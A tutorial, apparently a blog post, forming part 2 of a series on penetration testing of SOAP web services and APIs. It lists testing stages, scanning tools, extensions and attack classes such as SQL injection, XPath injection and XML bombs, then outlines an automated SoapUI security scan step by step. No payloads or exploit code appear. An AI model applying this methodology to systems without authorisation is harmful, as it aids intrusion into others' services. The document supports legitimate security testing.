Web Services and API Penetration Testing Part #2

Welcome readers to Part 2 of Web Services Penetration Testing.

In this part, we will take a quick look into the various test cases, tools and method for security testing of Web Services.
Black box Web Services Penetration Testing pre-requisite:

-> Web Service Description Language (WSDL) file
Grey box Web Services Penetration Testing pre-requisite:

-> Sample requests/responses for methods along with WSDL file.

Stages of Penetration Testing of Web Service:
1. Information Gathering
2. Black Box
3. Google hacking (using dorks to discover web services for websites hosted over network)
4. UDDI
5. Web Service Discovery (If no WSDL provided)
6. Authentication Type Discovery

Testing Methodology:
-> Automated Testing Tools
• SoapUI Pro
• OWASP ZAP
• IBM AppScan
• HP Webinspect
• WSBang
• WSMap

->  Manual Testing Tools
• Soap UI Free
• Burp Suite Pro
• Postman ( with burp)

->  Extensions:
• SAML Editor
• SAML Encoder / Decoder
• WSDL Wizard
• Wsdler
• SOA Client

Test cases to find in web services:
• Fuzzing
• XSS /SQLi/ Malformed XML
• File Upload
• Xpath Injection
• XML Bomb (DoS)
• Authentication based attacks
• Replay attacks
• Session fixation
• XML Signature wrapping
• Session timeout
• Host Cipher Support/ Valid Certificate/ Protocol Support
• Hashing Algorithm Support

Let’s now take a look on how to perform a automated scan using SOAP UI and get a preliminary first hand security report of the web services.

Using SOAP UI Pro for security assessments:
1. Fire up SOAP UI and create a functional testcase

Creating testcase
Creating testcase

2. Add security test

Adding security test
Adding security test

3. Select the “Auto” mode to generate default Security Scans and Assertions for the TestSteps in your TestCase and press “Next”:

Generate Security Scan
Generate Security Scan

4. Press OK to create the Security Test with the described configuration and open the Security Test window:

Execute Security Test
Execute Security Test

5. Now run the security test

Run Security Test
Run Security Test

6. Post the security scan, you can dig deeper into the output or generate reports also for your assessment.

Practice VMS for vulnerable web services:

• OWASP Mutillidae
• PenTester Lab: Axis2 Web Service and Tomcat Manager
• DVWS
• OWASP WebGoat

Part 3 of this series will focus on using burp suite+ postman along with SOAP UI for manual testing of web services.

Stay hooked.

References and sources
https://www.owasp.org/index.php/REST_Assessment_Cheat_Sheet
https://www.soapui.org/security-testing/getting-started.html